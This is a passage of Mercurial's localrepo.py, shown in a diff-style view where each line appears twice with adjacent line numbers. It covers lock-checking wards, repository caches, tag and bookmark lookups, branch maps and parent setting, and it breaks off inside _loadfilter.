496 if path.startswith('journal.'):
497 if path.startswith('journal.'):
497 # journal is covered by 'lock'
498 # journal is covered by 'lock'
498 if repo._currentlock(repo._lockref) is None:
499 if repo._currentlock(repo._lockref) is None:
499 repo.ui.develwarn('write with no lock: "%s"' % path,
500 repo.ui.develwarn('write with no lock: "%s"' % path,
500 stacklevel=2, config='check-locks')
501 stacklevel=2, config='check-locks')
501 elif repo._currentlock(repo._wlockref) is None:
502 elif repo._currentlock(repo._wlockref) is None:
502 # rest of vfs files are covered by 'wlock'
503 # rest of vfs files are covered by 'wlock'
503 #
504 #
504 # exclude special files
505 # exclude special files
505 for prefix in self._wlockfreeprefix:
506 for prefix in self._wlockfreeprefix:
506 if path.startswith(prefix):
507 if path.startswith(prefix):
507 return
508 return
508 repo.ui.develwarn('write with no wlock: "%s"' % path,
509 repo.ui.develwarn('write with no wlock: "%s"' % path,
509 stacklevel=2, config='check-locks')
510 stacklevel=2, config='check-locks')
510 return ret
511 return ret
511 return checkvfs
512 return checkvfs
512
513
513 def _getsvfsward(self, origfunc):
514 def _getsvfsward(self, origfunc):
514 """build a ward for self.svfs"""
515 """build a ward for self.svfs"""
515 rref = weakref.ref(self)
516 rref = weakref.ref(self)
516 def checksvfs(path, mode=None):
517 def checksvfs(path, mode=None):
517 ret = origfunc(path, mode=mode)
518 ret = origfunc(path, mode=mode)
518 repo = rref()
519 repo = rref()
519 if repo is None or not util.safehasattr(repo, '_lockref'):
520 if repo is None or not util.safehasattr(repo, '_lockref'):
520 return
521 return
521 if mode in (None, 'r', 'rb'):
522 if mode in (None, 'r', 'rb'):
522 return
523 return
523 if path.startswith(repo.sharedpath):
524 if path.startswith(repo.sharedpath):
524 # truncate name relative to the repository (.hg)
525 # truncate name relative to the repository (.hg)
525 path = path[len(repo.sharedpath) + 1:]
526 path = path[len(repo.sharedpath) + 1:]
526 if repo._currentlock(repo._lockref) is None:
527 if repo._currentlock(repo._lockref) is None:
527 repo.ui.develwarn('write with no lock: "%s"' % path,
528 repo.ui.develwarn('write with no lock: "%s"' % path,
528 stacklevel=3)
529 stacklevel=3)
529 return ret
530 return ret
530 return checksvfs
531 return checksvfs
531
532
532 def close(self):
533 def close(self):
533 self._writecaches()
534 self._writecaches()
534
535
535 def _loadextensions(self):
536 def _loadextensions(self):
536 extensions.loadall(self.ui)
537 extensions.loadall(self.ui)
537
538
538 def _writecaches(self):
539 def _writecaches(self):
539 if self._revbranchcache:
540 if self._revbranchcache:
540 self._revbranchcache.write()
541 self._revbranchcache.write()
541
542
542 def _restrictcapabilities(self, caps):
543 def _restrictcapabilities(self, caps):
543 if self.ui.configbool('experimental', 'bundle2-advertise'):
544 if self.ui.configbool('experimental', 'bundle2-advertise'):
544 caps = set(caps)
545 caps = set(caps)
545 capsblob = bundle2.encodecaps(bundle2.getrepocaps(self))
546 capsblob = bundle2.encodecaps(bundle2.getrepocaps(self))
546 caps.add('bundle2=' + urlreq.quote(capsblob))
547 caps.add('bundle2=' + urlreq.quote(capsblob))
547 return caps
548 return caps
548
549
549 def _applyopenerreqs(self):
550 def _applyopenerreqs(self):
550 self.svfs.options = dict((r, 1) for r in self.requirements
551 self.svfs.options = dict((r, 1) for r in self.requirements
551 if r in self.openerreqs)
552 if r in self.openerreqs)
552 # experimental config: format.chunkcachesize
553 # experimental config: format.chunkcachesize
553 chunkcachesize = self.ui.configint('format', 'chunkcachesize')
554 chunkcachesize = self.ui.configint('format', 'chunkcachesize')
554 if chunkcachesize is not None:
555 if chunkcachesize is not None:
555 self.svfs.options['chunkcachesize'] = chunkcachesize
556 self.svfs.options['chunkcachesize'] = chunkcachesize
556 # experimental config: format.maxchainlen
557 # experimental config: format.maxchainlen
557 maxchainlen = self.ui.configint('format', 'maxchainlen')
558 maxchainlen = self.ui.configint('format', 'maxchainlen')
558 if maxchainlen is not None:
559 if maxchainlen is not None:
559 self.svfs.options['maxchainlen'] = maxchainlen
560 self.svfs.options['maxchainlen'] = maxchainlen
560 # experimental config: format.manifestcachesize
561 # experimental config: format.manifestcachesize
561 manifestcachesize = self.ui.configint('format', 'manifestcachesize')
562 manifestcachesize = self.ui.configint('format', 'manifestcachesize')
562 if manifestcachesize is not None:
563 if manifestcachesize is not None:
563 self.svfs.options['manifestcachesize'] = manifestcachesize
564 self.svfs.options['manifestcachesize'] = manifestcachesize
564 # experimental config: format.aggressivemergedeltas
565 # experimental config: format.aggressivemergedeltas
565 aggressivemergedeltas = self.ui.configbool('format',
566 aggressivemergedeltas = self.ui.configbool('format',
566 'aggressivemergedeltas')
567 'aggressivemergedeltas')
567 self.svfs.options['aggressivemergedeltas'] = aggressivemergedeltas
568 self.svfs.options['aggressivemergedeltas'] = aggressivemergedeltas
568 self.svfs.options['lazydeltabase'] = not scmutil.gddeltaconfig(self.ui)
569 self.svfs.options['lazydeltabase'] = not scmutil.gddeltaconfig(self.ui)
569 chainspan = self.ui.configbytes('experimental', 'maxdeltachainspan', -1)
570 chainspan = self.ui.configbytes('experimental', 'maxdeltachainspan', -1)
570 if 0 <= chainspan:
571 if 0 <= chainspan:
571 self.svfs.options['maxdeltachainspan'] = chainspan
572 self.svfs.options['maxdeltachainspan'] = chainspan
572
573
573 for r in self.requirements:
574 for r in self.requirements:
574 if r.startswith('exp-compression-'):
575 if r.startswith('exp-compression-'):
575 self.svfs.options['compengine'] = r[len('exp-compression-'):]
576 self.svfs.options['compengine'] = r[len('exp-compression-'):]
576
577
577 # TODO move "revlogv2" to openerreqs once finalized.
578 # TODO move "revlogv2" to openerreqs once finalized.
578 if REVLOGV2_REQUIREMENT in self.requirements:
579 if REVLOGV2_REQUIREMENT in self.requirements:
579 self.svfs.options['revlogv2'] = True
580 self.svfs.options['revlogv2'] = True
580
581
581 def _writerequirements(self):
582 def _writerequirements(self):
582 scmutil.writerequires(self.vfs, self.requirements)
583 scmutil.writerequires(self.vfs, self.requirements)
583
584
584 def _checknested(self, path):
585 def _checknested(self, path):
585 """Determine if path is a legal nested repository."""
586 """Determine if path is a legal nested repository."""
586 if not path.startswith(self.root):
587 if not path.startswith(self.root):
587 return False
588 return False
588 subpath = path[len(self.root) + 1:]
589 subpath = path[len(self.root) + 1:]
589 normsubpath = util.pconvert(subpath)
590 normsubpath = util.pconvert(subpath)
590
591
591 # XXX: Checking against the current working copy is wrong in
592 # XXX: Checking against the current working copy is wrong in
592 # the sense that it can reject things like
593 # the sense that it can reject things like
593 #
594 #
594 # $ hg cat -r 10 sub/x.txt
595 # $ hg cat -r 10 sub/x.txt
595 #
596 #
596 # if sub/ is no longer a subrepository in the working copy
597 # if sub/ is no longer a subrepository in the working copy
597 # parent revision.
598 # parent revision.
598 #
599 #
599 # However, it can of course also allow things that would have
600 # However, it can of course also allow things that would have
600 # been rejected before, such as the above cat command if sub/
601 # been rejected before, such as the above cat command if sub/
601 # is a subrepository now, but was a normal directory before.
602 # is a subrepository now, but was a normal directory before.
602 # The old path auditor would have rejected by mistake since it
603 # The old path auditor would have rejected by mistake since it
603 # panics when it sees sub/.hg/.
604 # panics when it sees sub/.hg/.
604 #
605 #
605 # All in all, checking against the working copy seems sensible
606 # All in all, checking against the working copy seems sensible
606 # since we want to prevent access to nested repositories on
607 # since we want to prevent access to nested repositories on
607 # the filesystem *now*.
608 # the filesystem *now*.
608 ctx = self[None]
609 ctx = self[None]
609 parts = util.splitpath(subpath)
610 parts = util.splitpath(subpath)
610 while parts:
611 while parts:
611 prefix = '/'.join(parts)
612 prefix = '/'.join(parts)
612 if prefix in ctx.substate:
613 if prefix in ctx.substate:
613 if prefix == normsubpath:
614 if prefix == normsubpath:
614 return True
615 return True
615 else:
616 else:
616 sub = ctx.sub(prefix)
617 sub = ctx.sub(prefix)
617 return sub.checknested(subpath[len(prefix) + 1:])
618 return sub.checknested(subpath[len(prefix) + 1:])
618 else:
619 else:
619 parts.pop()
620 parts.pop()
620 return False
621 return False
621
622
622 def peer(self):
623 def peer(self):
623 return localpeer(self) # not cached to avoid reference cycle
624 return localpeer(self) # not cached to avoid reference cycle
624
625
625 def unfiltered(self):
626 def unfiltered(self):
626 """Return unfiltered version of the repository
627 """Return unfiltered version of the repository
627
628
628 Intended to be overwritten by filtered repo."""
629 Intended to be overwritten by filtered repo."""
629 return self
630 return self
630
631
631 def filtered(self, name):
632 def filtered(self, name):
632 """Return a filtered version of a repository"""
633 """Return a filtered version of a repository"""
633 # Python <3.4 easily leaks types via __mro__. See
634 # Python <3.4 easily leaks types via __mro__. See
634 # https://bugs.python.org/issue17950. We cache dynamically
635 # https://bugs.python.org/issue17950. We cache dynamically
635 # created types so this method doesn't leak on every
636 # created types so this method doesn't leak on every
636 # invocation.
637 # invocation.
637
638
638 key = self.unfiltered().__class__
639 key = self.unfiltered().__class__
639 if key not in self._filteredrepotypes:
640 if key not in self._filteredrepotypes:
640 # Build a new type with the repoview mixin and the base
641 # Build a new type with the repoview mixin and the base
641 # class of this repo. Give it a name containing the
642 # class of this repo. Give it a name containing the
642 # filter name to aid debugging.
643 # filter name to aid debugging.
643 bases = (repoview.repoview, key)
644 bases = (repoview.repoview, key)
644 cls = type(r'%sfilteredrepo' % name, bases, {})
645 cls = type(r'%sfilteredrepo' % name, bases, {})
645 self._filteredrepotypes[key] = cls
646 self._filteredrepotypes[key] = cls
646
647
647 return self._filteredrepotypes[key](self, name)
648 return self._filteredrepotypes[key](self, name)
648
649
649 @repofilecache('bookmarks', 'bookmarks.current')
650 @repofilecache('bookmarks', 'bookmarks.current')
650 def _bookmarks(self):
651 def _bookmarks(self):
651 return bookmarks.bmstore(self)
652 return bookmarks.bmstore(self)
652
653
653 @property
654 @property
654 def _activebookmark(self):
655 def _activebookmark(self):
655 return self._bookmarks.active
656 return self._bookmarks.active
656
657
657 # _phaserevs and _phasesets depend on changelog. what we need is to
658 # _phaserevs and _phasesets depend on changelog. what we need is to
658 # call _phasecache.invalidate() if '00changelog.i' was changed, but it
659 # call _phasecache.invalidate() if '00changelog.i' was changed, but it
659 # can't be easily expressed in filecache mechanism.
660 # can't be easily expressed in filecache mechanism.
660 @storecache('phaseroots', '00changelog.i')
661 @storecache('phaseroots', '00changelog.i')
661 def _phasecache(self):
662 def _phasecache(self):
662 return phases.phasecache(self, self._phasedefaults)
663 return phases.phasecache(self, self._phasedefaults)
663
664
664 @storecache('obsstore')
665 @storecache('obsstore')
665 def obsstore(self):
666 def obsstore(self):
666 return obsolete.makestore(self.ui, self)
667 return obsolete.makestore(self.ui, self)
667
668
668 @storecache('00changelog.i')
669 @storecache('00changelog.i')
669 def changelog(self):
670 def changelog(self):
670 return changelog.changelog(self.svfs,
671 return changelog.changelog(self.svfs,
671 trypending=txnutil.mayhavepending(self.root))
672 trypending=txnutil.mayhavepending(self.root))
672
673
673 def _constructmanifest(self):
674 def _constructmanifest(self):
674 # This is a temporary function while we migrate from manifest to
675 # This is a temporary function while we migrate from manifest to
675 # manifestlog. It allows bundlerepo and unionrepo to intercept the
676 # manifestlog. It allows bundlerepo and unionrepo to intercept the
676 # manifest creation.
677 # manifest creation.
677 return manifest.manifestrevlog(self.svfs)
678 return manifest.manifestrevlog(self.svfs)
678
679
679 @storecache('00manifest.i')
680 @storecache('00manifest.i')
680 def manifestlog(self):
681 def manifestlog(self):
681 return manifest.manifestlog(self.svfs, self)
682 return manifest.manifestlog(self.svfs, self)
682
683
683 @repofilecache('dirstate')
684 @repofilecache('dirstate')
684 def dirstate(self):
685 def dirstate(self):
685 sparsematchfn = lambda: sparse.matcher(self)
686 sparsematchfn = lambda: sparse.matcher(self)
686
687
687 return dirstate.dirstate(self.vfs, self.ui, self.root,
688 return dirstate.dirstate(self.vfs, self.ui, self.root,
688 self._dirstatevalidate, sparsematchfn)
689 self._dirstatevalidate, sparsematchfn)
689
690
690 def _dirstatevalidate(self, node):
691 def _dirstatevalidate(self, node):
691 try:
692 try:
692 self.changelog.rev(node)
693 self.changelog.rev(node)
693 return node
694 return node
694 except error.LookupError:
695 except error.LookupError:
695 if not self._dirstatevalidatewarned:
696 if not self._dirstatevalidatewarned:
696 self._dirstatevalidatewarned = True
697 self._dirstatevalidatewarned = True
697 self.ui.warn(_("warning: ignoring unknown"
698 self.ui.warn(_("warning: ignoring unknown"
698 " working parent %s!\n") % short(node))
699 " working parent %s!\n") % short(node))
699 return nullid
700 return nullid
700
701
701 def __getitem__(self, changeid):
702 def __getitem__(self, changeid):
702 if changeid is None:
703 if changeid is None:
703 return context.workingctx(self)
704 return context.workingctx(self)
704 if isinstance(changeid, slice):
705 if isinstance(changeid, slice):
705 # wdirrev isn't contiguous so the slice shouldn't include it
706 # wdirrev isn't contiguous so the slice shouldn't include it
706 return [context.changectx(self, i)
707 return [context.changectx(self, i)
707 for i in xrange(*changeid.indices(len(self)))
708 for i in xrange(*changeid.indices(len(self)))
708 if i not in self.changelog.filteredrevs]
709 if i not in self.changelog.filteredrevs]
709 try:
710 try:
710 return context.changectx(self, changeid)
711 return context.changectx(self, changeid)
711 except error.WdirUnsupported:
712 except error.WdirUnsupported:
712 return context.workingctx(self)
713 return context.workingctx(self)
713
714
714 def __contains__(self, changeid):
715 def __contains__(self, changeid):
715 """True if the given changeid exists
716 """True if the given changeid exists
716
717
717 error.LookupError is raised if an ambiguous node specified.
718 error.LookupError is raised if an ambiguous node specified.
718 """
719 """
719 try:
720 try:
720 self[changeid]
721 self[changeid]
721 return True
722 return True
722 except error.RepoLookupError:
723 except error.RepoLookupError:
723 return False
724 return False
724
725
725 def __nonzero__(self):
726 def __nonzero__(self):
726 return True
727 return True
727
728
728 __bool__ = __nonzero__
729 __bool__ = __nonzero__
729
730
730 def __len__(self):
731 def __len__(self):
731 return len(self.changelog)
732 return len(self.changelog)
732
733
733 def __iter__(self):
734 def __iter__(self):
734 return iter(self.changelog)
735 return iter(self.changelog)
735
736
736 def revs(self, expr, *args):
737 def revs(self, expr, *args):
737 '''Find revisions matching a revset.
738 '''Find revisions matching a revset.
738
739
739 The revset is specified as a string ``expr`` that may contain
740 The revset is specified as a string ``expr`` that may contain
740 %-formatting to escape certain types. See ``revsetlang.formatspec``.
741 %-formatting to escape certain types. See ``revsetlang.formatspec``.
741
742
742 Revset aliases from the configuration are not expanded. To expand
743 Revset aliases from the configuration are not expanded. To expand
743 user aliases, consider calling ``scmutil.revrange()`` or
744 user aliases, consider calling ``scmutil.revrange()`` or
744 ``repo.anyrevs([expr], user=True)``.
745 ``repo.anyrevs([expr], user=True)``.
745
746
746 Returns a revset.abstractsmartset, which is a list-like interface
747 Returns a revset.abstractsmartset, which is a list-like interface
747 that contains integer revisions.
748 that contains integer revisions.
748 '''
749 '''
749 expr = revsetlang.formatspec(expr, *args)
750 expr = revsetlang.formatspec(expr, *args)
750 m = revset.match(None, expr)
751 m = revset.match(None, expr)
751 return m(self)
752 return m(self)
752
753
753 def set(self, expr, *args):
754 def set(self, expr, *args):
754 '''Find revisions matching a revset and emit changectx instances.
755 '''Find revisions matching a revset and emit changectx instances.
755
756
756 This is a convenience wrapper around ``revs()`` that iterates the
757 This is a convenience wrapper around ``revs()`` that iterates the
757 result and is a generator of changectx instances.
758 result and is a generator of changectx instances.
758
759
759 Revset aliases from the configuration are not expanded. To expand
760 Revset aliases from the configuration are not expanded. To expand
760 user aliases, consider calling ``scmutil.revrange()``.
761 user aliases, consider calling ``scmutil.revrange()``.
761 '''
762 '''
762 for r in self.revs(expr, *args):
763 for r in self.revs(expr, *args):
763 yield self[r]
764 yield self[r]
764
765
765 def anyrevs(self, specs, user=False, localalias=None):
766 def anyrevs(self, specs, user=False, localalias=None):
766 '''Find revisions matching one of the given revsets.
767 '''Find revisions matching one of the given revsets.
767
768
768 Revset aliases from the configuration are not expanded by default. To
769 Revset aliases from the configuration are not expanded by default. To
769 expand user aliases, specify ``user=True``. To provide some local
770 expand user aliases, specify ``user=True``. To provide some local
770 definitions overriding user aliases, set ``localalias`` to
771 definitions overriding user aliases, set ``localalias`` to
771 ``{name: definitionstring}``.
772 ``{name: definitionstring}``.
772 '''
773 '''
773 if user:
774 if user:
774 m = revset.matchany(self.ui, specs, repo=self,
775 m = revset.matchany(self.ui, specs, repo=self,
775 localalias=localalias)
776 localalias=localalias)
776 else:
777 else:
777 m = revset.matchany(None, specs, localalias=localalias)
778 m = revset.matchany(None, specs, localalias=localalias)
778 return m(self)
779 return m(self)
779
780
780 def url(self):
781 def url(self):
781 return 'file:' + self.root
782 return 'file:' + self.root
782
783
783 def hook(self, name, throw=False, **args):
784 def hook(self, name, throw=False, **args):
784 """Call a hook, passing this repo instance.
785 """Call a hook, passing this repo instance.
785
786
786 This a convenience method to aid invoking hooks. Extensions likely
787 This a convenience method to aid invoking hooks. Extensions likely
787 won't call this unless they have registered a custom hook or are
788 won't call this unless they have registered a custom hook or are
788 replacing code that is expected to call a hook.
789 replacing code that is expected to call a hook.
789 """
790 """
790 return hook.hook(self.ui, self, name, throw, **args)
791 return hook.hook(self.ui, self, name, throw, **args)
791
792
792 @filteredpropertycache
793 @filteredpropertycache
793 def _tagscache(self):
794 def _tagscache(self):
794 '''Returns a tagscache object that contains various tags related
795 '''Returns a tagscache object that contains various tags related
795 caches.'''
796 caches.'''
796
797
797 # This simplifies its cache management by having one decorated
798 # This simplifies its cache management by having one decorated
798 # function (this one) and the rest simply fetch things from it.
799 # function (this one) and the rest simply fetch things from it.
799 class tagscache(object):
800 class tagscache(object):
800 def __init__(self):
801 def __init__(self):
801 # These two define the set of tags for this repository. tags
802 # These two define the set of tags for this repository. tags
802 # maps tag name to node; tagtypes maps tag name to 'global' or
803 # maps tag name to node; tagtypes maps tag name to 'global' or
803 # 'local'. (Global tags are defined by .hgtags across all
804 # 'local'. (Global tags are defined by .hgtags across all
804 # heads, and local tags are defined in .hg/localtags.)
805 # heads, and local tags are defined in .hg/localtags.)
805 # They constitute the in-memory cache of tags.
806 # They constitute the in-memory cache of tags.
806 self.tags = self.tagtypes = None
807 self.tags = self.tagtypes = None
807
808
808 self.nodetagscache = self.tagslist = None
809 self.nodetagscache = self.tagslist = None
809
810
810 cache = tagscache()
811 cache = tagscache()
811 cache.tags, cache.tagtypes = self._findtags()
812 cache.tags, cache.tagtypes = self._findtags()
812
813
813 return cache
814 return cache
814
815
815 def tags(self):
816 def tags(self):
816 '''return a mapping of tag to node'''
817 '''return a mapping of tag to node'''
817 t = {}
818 t = {}
818 if self.changelog.filteredrevs:
819 if self.changelog.filteredrevs:
819 tags, tt = self._findtags()
820 tags, tt = self._findtags()
820 else:
821 else:
821 tags = self._tagscache.tags
822 tags = self._tagscache.tags
822 for k, v in tags.iteritems():
823 for k, v in tags.iteritems():
823 try:
824 try:
824 # ignore tags to unknown nodes
825 # ignore tags to unknown nodes
825 self.changelog.rev(v)
826 self.changelog.rev(v)
826 t[k] = v
827 t[k] = v
827 except (error.LookupError, ValueError):
828 except (error.LookupError, ValueError):
828 pass
829 pass
829 return t
830 return t
830
831
831 def _findtags(self):
832 def _findtags(self):
832 '''Do the hard work of finding tags. Return a pair of dicts
833 '''Do the hard work of finding tags. Return a pair of dicts
833 (tags, tagtypes) where tags maps tag name to node, and tagtypes
834 (tags, tagtypes) where tags maps tag name to node, and tagtypes
834 maps tag name to a string like \'global\' or \'local\'.
835 maps tag name to a string like \'global\' or \'local\'.
835 Subclasses or extensions are free to add their own tags, but
836 Subclasses or extensions are free to add their own tags, but
836 should be aware that the returned dicts will be retained for the
837 should be aware that the returned dicts will be retained for the
837 duration of the localrepo object.'''
838 duration of the localrepo object.'''
838
839
839 # XXX what tagtype should subclasses/extensions use? Currently
840 # XXX what tagtype should subclasses/extensions use? Currently
840 # mq and bookmarks add tags, but do not set the tagtype at all.
841 # mq and bookmarks add tags, but do not set the tagtype at all.
841 # Should each extension invent its own tag type? Should there
842 # Should each extension invent its own tag type? Should there
842 # be one tagtype for all such "virtual" tags? Or is the status
843 # be one tagtype for all such "virtual" tags? Or is the status
843 # quo fine?
844 # quo fine?
844
845
845
846
846 # map tag name to (node, hist)
847 # map tag name to (node, hist)
847 alltags = tagsmod.findglobaltags(self.ui, self)
848 alltags = tagsmod.findglobaltags(self.ui, self)
848 # map tag name to tag type
849 # map tag name to tag type
849 tagtypes = dict((tag, 'global') for tag in alltags)
850 tagtypes = dict((tag, 'global') for tag in alltags)
850
851
851 tagsmod.readlocaltags(self.ui, self, alltags, tagtypes)
852 tagsmod.readlocaltags(self.ui, self, alltags, tagtypes)
852
853
853 # Build the return dicts. Have to re-encode tag names because
854 # Build the return dicts. Have to re-encode tag names because
854 # the tags module always uses UTF-8 (in order not to lose info
855 # the tags module always uses UTF-8 (in order not to lose info
855 # writing to the cache), but the rest of Mercurial wants them in
856 # writing to the cache), but the rest of Mercurial wants them in
856 # local encoding.
857 # local encoding.
857 tags = {}
858 tags = {}
858 for (name, (node, hist)) in alltags.iteritems():
859 for (name, (node, hist)) in alltags.iteritems():
859 if node != nullid:
860 if node != nullid:
860 tags[encoding.tolocal(name)] = node
861 tags[encoding.tolocal(name)] = node
861 tags['tip'] = self.changelog.tip()
862 tags['tip'] = self.changelog.tip()
862 tagtypes = dict([(encoding.tolocal(name), value)
863 tagtypes = dict([(encoding.tolocal(name), value)
863 for (name, value) in tagtypes.iteritems()])
864 for (name, value) in tagtypes.iteritems()])
864 return (tags, tagtypes)
865 return (tags, tagtypes)
865
866
866 def tagtype(self, tagname):
867 def tagtype(self, tagname):
867 '''
868 '''
868 return the type of the given tag. result can be:
869 return the type of the given tag. result can be:
869
870
870 'local' : a local tag
871 'local' : a local tag
871 'global' : a global tag
872 'global' : a global tag
872 None : tag does not exist
873 None : tag does not exist
873 '''
874 '''
874
875
875 return self._tagscache.tagtypes.get(tagname)
876 return self._tagscache.tagtypes.get(tagname)
876
877
877 def tagslist(self):
878 def tagslist(self):
878 '''return a list of tags ordered by revision'''
879 '''return a list of tags ordered by revision'''
879 if not self._tagscache.tagslist:
880 if not self._tagscache.tagslist:
880 l = []
881 l = []
881 for t, n in self.tags().iteritems():
882 for t, n in self.tags().iteritems():
882 l.append((self.changelog.rev(n), t, n))
883 l.append((self.changelog.rev(n), t, n))
883 self._tagscache.tagslist = [(t, n) for r, t, n in sorted(l)]
884 self._tagscache.tagslist = [(t, n) for r, t, n in sorted(l)]
884
885
885 return self._tagscache.tagslist
886 return self._tagscache.tagslist
886
887
887 def nodetags(self, node):
888 def nodetags(self, node):
888 '''return the tags associated with a node'''
889 '''return the tags associated with a node'''
889 if not self._tagscache.nodetagscache:
890 if not self._tagscache.nodetagscache:
890 nodetagscache = {}
891 nodetagscache = {}
891 for t, n in self._tagscache.tags.iteritems():
892 for t, n in self._tagscache.tags.iteritems():
892 nodetagscache.setdefault(n, []).append(t)
893 nodetagscache.setdefault(n, []).append(t)
893 for tags in nodetagscache.itervalues():
894 for tags in nodetagscache.itervalues():
894 tags.sort()
895 tags.sort()
895 self._tagscache.nodetagscache = nodetagscache
896 self._tagscache.nodetagscache = nodetagscache
896 return self._tagscache.nodetagscache.get(node, [])
897 return self._tagscache.nodetagscache.get(node, [])
897
898
898 def nodebookmarks(self, node):
899 def nodebookmarks(self, node):
899 """return the list of bookmarks pointing to the specified node"""
900 """return the list of bookmarks pointing to the specified node"""
900 marks = []
901 marks = []
901 for bookmark, n in self._bookmarks.iteritems():
902 for bookmark, n in self._bookmarks.iteritems():
902 if n == node:
903 if n == node:
903 marks.append(bookmark)
904 marks.append(bookmark)
904 return sorted(marks)
905 return sorted(marks)
905
906
906 def branchmap(self):
907 def branchmap(self):
907 '''returns a dictionary {branch: [branchheads]} with branchheads
908 '''returns a dictionary {branch: [branchheads]} with branchheads
908 ordered by increasing revision number'''
909 ordered by increasing revision number'''
909 branchmap.updatecache(self)
910 branchmap.updatecache(self)
910 return self._branchcaches[self.filtername]
911 return self._branchcaches[self.filtername]
911
912
912 @unfilteredmethod
913 @unfilteredmethod
913 def revbranchcache(self):
914 def revbranchcache(self):
914 if not self._revbranchcache:
915 if not self._revbranchcache:
915 self._revbranchcache = branchmap.revbranchcache(self.unfiltered())
916 self._revbranchcache = branchmap.revbranchcache(self.unfiltered())
916 return self._revbranchcache
917 return self._revbranchcache
917
918
918 def branchtip(self, branch, ignoremissing=False):
919 def branchtip(self, branch, ignoremissing=False):
919 '''return the tip node for a given branch
920 '''return the tip node for a given branch
920
921
921 If ignoremissing is True, then this method will not raise an error.
922 If ignoremissing is True, then this method will not raise an error.
922 This is helpful for callers that only expect None for a missing branch
923 This is helpful for callers that only expect None for a missing branch
923 (e.g. namespace).
924 (e.g. namespace).
924
925
925 '''
926 '''
926 try:
927 try:
927 return self.branchmap().branchtip(branch)
928 return self.branchmap().branchtip(branch)
928 except KeyError:
929 except KeyError:
929 if not ignoremissing:
930 if not ignoremissing:
930 raise error.RepoLookupError(_("unknown branch '%s'") % branch)
931 raise error.RepoLookupError(_("unknown branch '%s'") % branch)
931 else:
932 else:
932 pass
933 pass
933
934
934 def lookup(self, key):
935 def lookup(self, key):
935 return self[key].node()
936 return self[key].node()
936
937
937 def lookupbranch(self, key, remote=None):
938 def lookupbranch(self, key, remote=None):
938 repo = remote or self
939 repo = remote or self
939 if key in repo.branchmap():
940 if key in repo.branchmap():
940 return key
941 return key
941
942
942 repo = (remote and remote.local()) and remote or self
943 repo = (remote and remote.local()) and remote or self
943 return repo[key].branch()
944 return repo[key].branch()
944
945
945 def known(self, nodes):
946 def known(self, nodes):
946 cl = self.changelog
947 cl = self.changelog
947 nm = cl.nodemap
948 nm = cl.nodemap
948 filtered = cl.filteredrevs
949 filtered = cl.filteredrevs
949 result = []
950 result = []
950 for n in nodes:
951 for n in nodes:
951 r = nm.get(n)
952 r = nm.get(n)
952 resp = not (r is None or r in filtered)
953 resp = not (r is None or r in filtered)
953 result.append(resp)
954 result.append(resp)
954 return result
955 return result
955
956
956 def local(self):
957 def local(self):
957 return self
958 return self
958
959
959 def publishing(self):
960 def publishing(self):
960 # it's safe (and desirable) to trust the publish flag unconditionally
961 # it's safe (and desirable) to trust the publish flag unconditionally
961 # so that we don't finalize changes shared between users via ssh or nfs
962 # so that we don't finalize changes shared between users via ssh or nfs
962 return self.ui.configbool('phases', 'publish', untrusted=True)
963 return self.ui.configbool('phases', 'publish', untrusted=True)
963
964
964 def cancopy(self):
965 def cancopy(self):
965 # so statichttprepo's override of local() works
966 # so statichttprepo's override of local() works
966 if not self.local():
967 if not self.local():
967 return False
968 return False
968 if not self.publishing():
969 if not self.publishing():
969 return True
970 return True
970 # if publishing we can't copy if there is filtered content
971 # if publishing we can't copy if there is filtered content
971 return not self.filtered('visible').changelog.filteredrevs
972 return not self.filtered('visible').changelog.filteredrevs
972
973
973 def shared(self):
974 def shared(self):
974 '''the type of shared repository (None if not shared)'''
975 '''the type of shared repository (None if not shared)'''
975 if self.sharedpath != self.path:
976 if self.sharedpath != self.path:
976 return 'store'
977 return 'store'
977 return None
978 return None
978
979
979 def wjoin(self, f, *insidef):
980 def wjoin(self, f, *insidef):
980 return self.vfs.reljoin(self.root, f, *insidef)
981 return self.vfs.reljoin(self.root, f, *insidef)
981
982
982 def file(self, f):
983 def file(self, f):
983 if f[0] == '/':
984 if f[0] == '/':
984 f = f[1:]
985 f = f[1:]
985 return filelog.filelog(self.svfs, f)
986 return filelog.filelog(self.svfs, f)
986
987
987 def changectx(self, changeid):
988 def changectx(self, changeid):
988 return self[changeid]
989 return self[changeid]
989
990
990 def setparents(self, p1, p2=nullid):
991 def setparents(self, p1, p2=nullid):
991 with self.dirstate.parentchange():
992 with self.dirstate.parentchange():
992 copies = self.dirstate.setparents(p1, p2)
993 copies = self.dirstate.setparents(p1, p2)
993 pctx = self[p1]
994 pctx = self[p1]
994 if copies:
995 if copies:
995 # Adjust copy records, the dirstate cannot do it, it
996 # Adjust copy records, the dirstate cannot do it, it
996 # requires access to parents manifests. Preserve them
997 # requires access to parents manifests. Preserve them
997 # only for entries added to first parent.
998 # only for entries added to first parent.
998 for f in copies:
999 for f in copies:
999 if f not in pctx and copies[f] in pctx:
1000 if f not in pctx and copies[f] in pctx:
1000 self.dirstate.copy(copies[f], f)
1001 self.dirstate.copy(copies[f], f)
1001 if p2 == nullid:
1002 if p2 == nullid:
1002 for f, s in sorted(self.dirstate.copies().items()):
1003 for f, s in sorted(self.dirstate.copies().items()):
1003 if f not in pctx and s not in pctx:
1004 if f not in pctx and s not in pctx:
1004 self.dirstate.copy(None, f)
1005 self.dirstate.copy(None, f)
1005
1006
1006 def filectx(self, path, changeid=None, fileid=None):
1007 def filectx(self, path, changeid=None, fileid=None):
1007 """changeid can be a changeset revision, node, or tag.
1008 """changeid can be a changeset revision, node, or tag.
1008 fileid can be a file revision or node."""
1009 fileid can be a file revision or node."""
1009 return context.filectx(self, path, changeid, fileid)
1010 return context.filectx(self, path, changeid, fileid)
1010
1011
1011 def getcwd(self):
1012 def getcwd(self):
1012 return self.dirstate.getcwd()
1013 return self.dirstate.getcwd()
1013
1014
1014 def pathto(self, f, cwd=None):
1015 def pathto(self, f, cwd=None):
1015 return self.dirstate.pathto(f, cwd)
1016 return self.dirstate.pathto(f, cwd)
1016
1017
1017 def _loadfilter(self, filter):
1018 def _loadfilter(self, filter):
1018 if filter not in self.filterpats:
1019 if filter not in self.filterpats:
1019 l = []
1020 l = []
1020 for pat, cmd in self.ui.configitems(filter):
1021 for pat, cmd in self.ui.configitems(filter):
1021 if cmd == '!':
1022 if cmd == '!':
1022 continue
1023 continue
1023 mf = matchmod.match(self.root, '', [pat])
1024 mf = matchmod.match(self.root, '', [pat])
1024 fn = None
1025 fn = None
1025 params = cmd
1026 params = cmd
1026 for name, filterfn in self._datafilters.iteritems():
1027 for name, filterfn in self._datafilters.iteritems():
1027 if cmd.startswith(name):
1028 if cmd.startswith(name):
